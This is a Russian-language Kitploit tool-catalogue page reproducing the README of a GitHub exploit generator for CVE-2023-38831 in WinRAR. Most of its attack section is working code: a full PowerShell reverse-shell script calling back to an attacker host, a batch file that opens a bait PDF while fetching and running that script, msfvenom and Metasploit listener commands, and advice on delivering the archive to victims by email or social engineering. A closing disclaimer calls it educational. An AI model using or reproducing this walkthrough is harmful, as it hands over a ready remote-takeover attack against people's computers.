Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38831-Exploit — Этот проект содержит Python-скрипт, который эксплуатирует **CVE-2023-38831** — уязвимость в версиях **WinRAR** ранее 6.23. Эксплойт создаёт **вредоносный RAR-архив**, который запускает выполнение произвольного кода, когда жертва открывает безобидный на вид файл внутри архива (например, PDF). | Kitploit
Инструменты/GitHubGitHub/technicalcorp0/cve-2023-38831-exploit
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСоциальная инженерияОбучение и ОбразованиеRed Teaming
GitHubtechnicalcorp0/cve-2023-38831-exploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот проект содержит Python-скрипт, который эксплуатирует **CVE-2023-38831** — уязвимость в версиях **WinRAR** ранее 6.23. Эксплойт создаёт **вредоносный RAR-архив**, который запускает выполнение произвольного кода, когда жертва открывает безобидный на вид файл внутри архива (например, PDF).

CVE-2023-38831-Exploit

Репозиторий
11 год назадЕщё не проверено
Поделиться

Генератор эксплойта CVE-2023-38831 для WinRAR

Создано: technical_corp

Этот проект содержит Python-скрипт, эксплуатирующий CVE-2023-38831 — уязвимость в WinRAR версиях до 6.23. Эксплойт генерирует вредоносный RAR-архив, который запускает выполнение произвольного кода, когда жертва открывает безобидно выглядящий файл внутри архива (например, PDF). Уязвимость активно эксплуатировалась в реальных атаках с апреля по август 2023 года.

Обзор уязвимости

CVE-2023-38831 — это уязвимость в WinRAR, которая позволяет злоумышленникам выполнять произвольный код, когда жертва открывает архив, содержащий как безвредный файл, так и вредоносную папку с одинаковым именем. Когда пользователь взаимодействует с безвредным файлом, WinRAR ошибочно обрабатывает содержимое вредоносной папки и выполняет полезную нагрузку злоумышленника.

Возможности эксплойта

  • Создаёт вредоносный RAR-архив, содержащий файл-приманку (например, PDF) и полезную нагрузку (например, .bat или .exe файл).
  • Файл-приманка может быть любым указанным пользователем файлом (например, PDF или документом).
  • Полезная нагрузка может быть любым исполняемым файлом или скриптом (например, reverse shell, созданным с помощью msfvenom).
  • Когда жертва открывает файл-приманку, полезная нагрузка незаметно выполняется в фоновом режиме.

Предварительные требования

  • Python 3.x
  • WinRAR версии ниже 6.23, установленный на машине жертвы (это уязвимая версия).
  • Скачайте WinRAR 6.22 отсюда
  • Metasploit Framework (опционально, для генерации полезных нагрузок).

Как использовать

Клонируйте этот репозиторий:

root@kitploit:~
git clone https://github.com/technical_corp/CVE-2023-38831-Exploit.git
cd CVE-2023-38831-Exploit

Мы будем использовать пакетный файл, встроенный в .rar архив, чтобы загрузить и выполнить размещённый PowerShell reverse shell.

Шаги:

Создайте скрипт PowerShell Reverse Shell:

Сохраните следующий PowerShell-скрипт как reverse.ps1 на вашей машине Kali Linux:

root@kitploit:~
$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<attacker_port>);
$stream = $client.GetStream();
[byte[]]$buffer = 0..65535|%{0};
while(($i = $stream.Read($buffer, 0, $buffer.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()};
$client.Close()

Замените <attacker_ip> на IP-адрес вашей машины Kali Linux.

Замените <attacker_port> на номер порта, на котором вы будете слушать.

Разместите PowerShell-скрипт на вашей машине Kali Linux:

Перейдите в папку, где сохранён PowerShell-скрипт:

root@kitploit:~
cd /path/to/powershell-script

Используйте HTTP-сервер Python для размещения файла на порту 80:

root@kitploit:~
python3 -m http.server 80

Это сделает reverse.ps1 доступным по адресу http://<attacker_ip>/reverse.ps1.

Создайте пакетный файл для загрузки и запуска PowerShell-скрипта:

Создайте пакетный файл (script.bat), который загрузит и выполнит PowerShell reverse shell:

root@kitploit:~
@echo off
:: Open the legitimate PDF
start bait.pdf

:: Download and execute the PowerShell script
powershell -Command "Invoke-WebRequest -Uri 'http://<attacker_ip>/reverse.ps1' -OutFile 'C:\Users\Public\reverse.ps1'; Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Users\Public\reverse.ps1' -NoNewWindow"
exit

Используйте скрипт эксплойта CVE-2023-38831 для встраивания пакетного файла:

Запустите скрипт эксплойта WinRAR, чтобы встроить пакетный файл в легитимный PDF:

root@kitploit:~
python3 CVE-2023-38831-WinRar-Exploit.py -b legitimate.pdf -p script.bat -o POC.rar

Эта команда создаёт файл POC.rar, который содержит script.bat, выполняющий reverse shell.

Настройте прослушиватель Netcat на Kali Linux:

Запустите прослушиватель Netcat, чтобы поймать reverse shell:

root@kitploit:~
nc -lvnp <attacker_port>

Доставьте эксплойт (POC.rar) жертве:

Когда жертва откроет POC.rar и запустит PDF-файл, будет активирован script.bat.

Скрипт загрузит и выполнит PowerShell reverse shell с вашего сервера.

Вы получите соединение reverse shell на вашем прослушивателе Netcat.

Использование исполняемого файла без немедленного выполнения:

Сгенерируйте полезную нагрузку (если используете Metasploit): вы можете создать полезную нагрузку reverse shell с помощью msfvenom:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Переместите созданный файл payload.exe в каталог CVE-2023-WinRAR-Exploit

Запустите генератор эксплойта: выполните Python-скрипт для создания вредоносного RAR-файла:

root@kitploit:~
python cve-2023-38831-exploiter.py -b nmapcheatsheet.pdf -p payload.exe -o POC.rar

-b: укажите файл-приманку (например, nmapcheatsheet.pdf). -p: укажите файл полезной нагрузки (например, script.bat или payload.exe). -o: укажите имя выходного файла (например, POC.rar).

Доставьте RAR-файл жертве: созданный malicious_archive.rar можно передать жертве через социальную инженерию, вложения электронной почты или файлообменные платформы.

Настройте прослушиватель (если используете Metasploit): на вашей машине атакующего настройте прослушиватель для перехвата reverse shell:

root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker_IP>
set LPORT <attacker_port>
exploit

Схема работы эксплойта

Злоумышленник доставляет жертве вредоносный RAR-файл.

Жертва открывает файл-приманку (например, nmapcheatsheet.pdf), что незаметно запускает полезную нагрузку.

Полезная нагрузка (например, reverse shell) выполняется в фоновом режиме, предоставляя злоумышленнику контроль над системой жертвы.

Отказ от ответственности

Этот проект предназначен только для образовательных целей. Автор не несёт ответственности за любое неправомерное использование данного эксплойта. Его следует использовать только в авторизованных средах или в сценариях тестирования на проникновение с полного согласия.

Скачать инструмент